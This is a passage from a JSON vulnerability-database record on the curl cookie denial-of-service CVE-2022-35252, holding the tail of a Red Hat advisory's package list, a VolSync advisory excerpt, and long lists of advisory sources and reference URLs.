23.el9.x86_64.rpm\nlibcurl-devel-7.76.1-23.el9.i686.rpm\nlibcurl-devel-7.76.1-23.el9.x86_64.rpm\nlibcurl-minimal-debuginfo-7.76.1-23.el9.i686.rpm\nlibcurl-minimal-debuginfo-7.76.1-23.el9.x86_64.rpm\n\nRed Hat Enterprise Linux BaseOS (v. 9):\n\nSource:\ncurl-7.76.1-23.el9.src.rpm\n\naarch64:\ncurl-7.76.1-23.el9.aarch64.rpm\ncurl-debuginfo-7.76.1-23.el9.aarch64.rpm\ncurl-debugsource-7.76.1-23.el9.aarch64.rpm\ncurl-minimal-7.76.1-23.el9.aarch64.rpm\ncurl-minimal-debuginfo-7.76.1-23.el9.aarch64.rpm\nlibcurl-7.76.1-23.el9.aarch64.rpm\nlibcurl-debuginfo-7.76.1-23.el9.aarch64.rpm\nlibcurl-minimal-7.76.1-23.el9.aarch64.rpm\nlibcurl-minimal-debuginfo-7.76.1-23.el9.aarch64.rpm\n\nppc64le:\ncurl-7.76.1-23.el9.ppc64le.rpm\ncurl-debuginfo-7.76.1-23.el9.ppc64le.rpm\ncurl-debugsource-7.76.1-23.el9.ppc64le.rpm\ncurl-minimal-7.76.1-23.el9.ppc64le.rpm\ncurl-minimal-debuginfo-7.76.1-23.el9.ppc64le.rpm\nlibcurl-7.76.1-23.el9.ppc64le.rpm\nlibcurl-debuginfo-7.76.1-23.el9.ppc64le.rpm\nlibcurl-minimal-7.76.1-23.el9.ppc64le.rpm\nlibcurl-minimal-debuginfo-7.76.1-23.el9.ppc64le.rpm\n\ns390x:\ncurl-7.76.1-23.el9.s390x.rpm\ncurl-debuginfo-7.76.1-23.el9.s390x.rpm\ncurl-debugsource-7.76.1-23.el9.s390x.rpm\ncurl-minimal-7.76.1-23.el9.s390x.rpm\ncurl-minimal-debuginfo-7.76.1-23.el9.s390x.rpm\nlibcurl-7.76.1-23.el9.s390x.rpm\nlibcurl-debuginfo-7.76.1-23.el9.s390x.rpm\nlibcurl-minimal-7.76.1-23.el9.s390x.rpm\nlibcurl-minimal-debuginfo-7.76.1-23.el9.s390x.rpm\n\nx86_64:\ncurl-7.76.1-23.el9.x86_64.rpm\ncurl-debuginfo-7.76.1-23.el9.i686.rpm\ncurl-debuginfo-7.76.1-23.el9.x86_64.rpm\ncurl-debugsource-7.76.1-23.el9.i686.rpm\ncurl-debugsource-7.76.1-23.el9.x86_64.rpm\ncurl-minimal-7.76.1-23.el9.x86_64.rpm\ncurl-minimal-debuginfo-7.76.1-23.el9.i686.rpm\ncurl-minimal-debuginfo-7.76.1-23.el9.x86_64.rpm\nlibcurl-7.76.1-23.el9.i686.rpm\nlibcurl-7.76.1-23.el9.x86_64.rpm\nlibcurl-debuginfo-7.76.1-23.el9.i686.rpm\nlibcurl-debuginfo-7.76.1-23.el9.x86_64.rpm\nlibcurl-minimal-7.76.1-23.el9.i686.rpm\nlibcurl-minimal-7.76.1-23.el9.x86_64.rpm\nlibcurl-minimal-debuginfo-7.76.1-23.el9.i686.rpm\nlibcurl-minimal-debuginfo-7.76.1-23.el9.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2022-35252\nhttps://access.redhat.com/security/cve/CVE-2022-43552\nhttps://access.redhat.com/security/updates/classification/#low\nhttps://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/9/html/9.2_release_notes/index\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2023 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBZFo0V9zjgjWX9erEAQhmTw/9FUwLCGRKCmddNVTMAaay54EPggJFOPKx\nnN06YIqiK5arkX4SD58YZrX9J0gUZcwGs6s5WO35pG3F+qJXhe8E8fbzavqRG5NB\noxG+pDC5+6xQxK41tkuLYJoUhF1w4yG8SuMSzroLcpbut/MAjKGGw4qgyNGit1Su\nxFGrDTyFxtj+tUZIQCil0HAqlXswQ7G2ukB9kQBpxNRfR0V2ANfmfkkGj8+xWauh\nL1PcaDezNWgAbgWbuf3mHNiwDMxWsNfcwCbx3P8sF+vRe7q5RdIFNL1oXJkPxQVy\nC6L29KcaLYxToNmUNyrOncWAj8KSlrDngVq3NXnG34lVzqz2t/ouc/0lX4Jc9qTL\nmGwYoXvlTqQgV4hGQPfDufApaukxgZfcSidSfqlNt1amYYNiYcvIyf15dht87ipB\n27ahZWDKvunB4gqMG62XNHyiu9bKmDCyL57ggUBt3wxJ7H9M/OgjsI7C/i/10SMT\nD75GjYaU2TWyGLd4SvbV6/3pA3zAZ0Ffqc66uANwfBXC7jFd2/ykEBir3vJYTq17\nr2YWYgH2sma5kwb7ZHQhLKk+N2a0g1KX+Mr0V2wJ+yAYwkbz6wu/BVDXstBFkumJ\n/iKmtOn0Mk07wo/3wvWu5M4tk4kZzmLzs1/ybH3GWOUbFUxbqgOos3/0Vi/uSW88\nYxf4bV/uBmU=HlZ2\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Description:\n\nVolSync is a Kubernetes operator that enables asynchronous replication of\npersistent volumes within a cluster, or across clusters. After deploying\nthe VolSync operator, it can create and maintain copies of your persistent\ndata. \n\nFor more information about VolSync, see:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.7/html/add-ons/add-ons-overview#volsync\n\nor the VolSync open source community website at:\nhttps://volsync.readthedocs.io/en/stable/. \n\nSecurity fix(es): * CVE-2023-3089 openshift: OCP \u0026 FIPS mode\n\n3. Bugs fixed (https://bugzilla.redhat.com/):\n\n2212085 - CVE-2023-3089 openshift: OCP \u0026 FIPS mode\n\n5",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2022-35252"
      },
      {
        "db": "VULHUB",
        "id": "VHN-428403"
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-35252"
      },
      {
        "db": "PACKETSTORM",
        "id": "168239"
      },
      {
        "db": "PACKETSTORM",
        "id": "170303"
      },
      {
        "db": "PACKETSTORM",
        "id": "170697"
      },
      {
        "db": "PACKETSTORM",
        "id": "170698"
      },
      {
        "db": "PACKETSTORM",
        "id": "176746"
      },
      {
        "db": "PACKETSTORM",
        "id": "172378"
      },
      {
        "db": "PACKETSTORM",
        "id": "172587"
      },
      {
        "db": "PACKETSTORM",
        "id": "172195"
      },
      {
        "db": "PACKETSTORM",
        "id": "174080"
      }
    ],
    "trust": 1.89
  },
  "external_ids": {
    "_id": null,
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2022-35252",
        "trust": 2.7
      },
      {
        "db": "HACKERONE",
        "id": "1613943",
        "trust": 1.7
      },
      {
        "db": "PACKETSTORM",
        "id": "168239",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202208-4523",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "170698",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.4343",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.6333",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.4375",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2023.3732",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2023.2163",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2023.3143",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2023.3060",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.4374",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-428403",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-35252",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "170303",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "170697",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "176746",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "172378",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "172587",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "172195",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "174080",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-428403"
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-35252"
      },
      {
        "db": "PACKETSTORM",
        "id": "168239"
      },
      {
        "db": "PACKETSTORM",
        "id": "170303"
      },
      {
        "db": "PACKETSTORM",
        "id": "170697"
      },
      {
        "db": "PACKETSTORM",
        "id": "170698"
      },
      {
        "db": "PACKETSTORM",
        "id": "176746"
      },
      {
        "db": "PACKETSTORM",
        "id": "172378"
      },
      {
        "db": "PACKETSTORM",
        "id": "172587"
      },
      {
        "db": "PACKETSTORM",
        "id": "172195"
      },
      {
        "db": "PACKETSTORM",
        "id": "174080"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202208-4523"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-35252"
      }
    ]
  },
  "id": "VAR-202208-2263",
  "iot": {
    "_id": null,
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-428403"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2026-03-09T23:13:33.194000Z",
  "patch": {
    "_id": null,
    "data": [
      {
        "title": "curl Security vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=206230"
      },
      {
        "title": "Debian CVElist Bug Report Logs: curl: CVE-2022-35252: control code in cookie denial of service",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=f071eb46e3ac96bc3c50d0406c2d0685"
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/JtMotoX/docker-trivy "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2022-35252"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202208-4523"
      }
    ]
  },
  "problemtype_data": {
    "_id": null,
    "data": [
      {
        "problemtype": "NVD-CWE-noinfo",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-20",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2022-35252"
      }
    ]
  },
  "references": {
    "_id": null,
    "data": [
      {
        "trust": 1.8,
        "url": "https://security.gentoo.org/glsa/202212-01"
      },
      {
        "trust": 1.7,
        "url": "https://security.netapp.com/advisory/ntap-20220930-0005/"
      },
      {
        "trust": 1.7,
        "url": "https://support.apple.com/kb/ht213603"
      },
      {
        "trust": 1.7,
        "url": "https://support.apple.com/kb/ht213604"
      },
      {
        "trust": 1.7,
        "url": "http://seclists.org/fulldisclosure/2023/jan/20"
      },
      {
        "trust": 1.7,
        "url": "http://seclists.org/fulldisclosure/2023/jan/21"
      },
      {
        "trust": 1.7,
        "url": "https://hackerone.com/reports/1613943"
      },
      {
        "trust": 1.7,
        "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00028.html"
      },
      {
        "trust": 1.0,
        "url": "https://access.redhat.com/security/cve/cve-2022-35252"
      },
      {
        "trust": 0.8,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-35252"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/170698/apple-security-advisory-2023-01-23-6.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2023.3143"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2023.2163"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2023.3060"
      },
      {
        "trust": 0.6,
        "url": "https://cxsecurity.com/cveshow/cve-2022-35252/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2023.3732"
      },
      {
        "trust": 0.6,
        "url": "https://support.apple.com/en-us/ht213604"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/curl-denial-of-service-via-cookies-control-codes-39156"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/168239/ubuntu-security-notice-usn-5587-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.4374"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.4343"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.4375"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.6333"
      },
      {
        "trust": 0.4,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.4,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2022-43552"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-43552"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-35260"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-42916"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-42915"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32221"
      },
      {
        "trust": 0.2,
        "url": "https://support.apple.com/downloads/"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-23497"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-23505"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-23499"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-23508"
      },
      {
        "trust": 0.2,
        "url": "https://www.apple.com/support/security/pgp/"
      },
      {
        "trust": 0.2,
        "url": "https://support.apple.com/en-us/ht201222."
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/updates/classification/#low"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2023-0361"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2023-27535"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-36227"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1018831"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/jtmotox/docker-trivy"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/curl/7.58.0-2ubuntu3.20"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5587-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/curl/7.81.0-1ubuntu1.4"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/curl/7.68.0-1ubuntu2.13"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22922"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-27782"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-27776"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-27779"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-30115"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-22576"
      },
      {
        "trust": 0.1,
        "url": "https://security.gentoo.org/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22925"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22926"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-27781"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22945"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32208"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32206"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32207"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-27774"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-27775"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.gentoo.org."
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32205"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-27780"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22923"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22946"
      },
      {
        "trust": 0.1,
        "url": "https://creativecommons.org/licenses/by-sa/2.5"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22947"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-23507"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-23493"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-23504"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32915"
      },
      {
        "trust": 0.1,
        "url": "https://support.apple.com/ht213604."
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-23502"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-23518"
      },
      {
        "trust": 0.1,
        "url": "https://support.apple.com/ht213603."
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-23517"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-23513"
      },
      {
        "trust": 0.1,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2152652"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2024:0428"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0428.json"
      },
      {
        "trust": 0.1,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2179073"
      },
      {
        "trust": 0.1,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2120718"
      },
      {
        "trust": 0.1,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2179092"
      },
      {
        "trust": 0.1,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2252030"
      },
      {
        "trust": 0.1,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2196793"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.8_release_notes/index"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2023:2963"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-3619"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-41674"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-42721"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-30594"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/updates/classification/#critical"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-2196"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-3625"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-43750"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-30594"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-4129"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-41218"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-3239"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-3522"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-26341"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-3239"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-25815"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-42722"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1679"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-2663"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-3707"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-1582"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1462"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-22490"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-3028"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-20141"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/release_notes/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-32314"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-47929"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-39188"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-2663"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-32313"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-3623"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-1999"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-26341"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-3566"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1789"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-3627"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1789"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-20141"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-28856"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-2196"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-23454"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-25265"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-3524"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-39189"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33656"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-3970"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-3028"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-3567"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33656"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-0394"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-0461"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33655"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-25652"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33655"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2023:3326"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-3628"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-3564"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-1195"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/install/installing#installing-while-connected-online"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-42720"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-23946"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-42703"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-25265"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-3522"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-29007"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1462"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1679"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2023:2478"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/9/html/9.2_release_notes/index"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-1667"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-2283"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-0361"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24736"
      },
      {
        "trust": 0.1,
        "url": "https://volsync.readthedocs.io/en/stable/."
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2023:4576"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-38408"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-24736"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.7/html/add-ons/add-ons-overview#volsync"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-2283"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.7/html/add-ons/add-ons-overview#volsync-rep"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-3089"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-24329"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-1667"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-26604"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/vulnerabilities/rhsb-2023-001"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-24329"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-27535"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-38408"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-3089"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-26604"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-36227"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-428403"
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-35252"
      },
      {
        "db": "PACKETSTORM",
        "id": "168239"
      },
      {
        "db": "PACKETSTORM",
        "id": "170303"
      },
      {
        "db": "PACKETSTORM",
        "id": "170697"
      },
      {
        "db": "PACKETSTORM",
        "id": "170698"
      },
      {
        "db": "PACKETSTORM",
        "id": "176746"
      },
      {
        "db": "PACKETSTORM",
        "id": "172378"
      },
      {
        "db": "PACKETSTORM",
        "id": "172587"
      },
      {
        "db": "PACKETSTORM",
        "id": "172195"
      },
      {
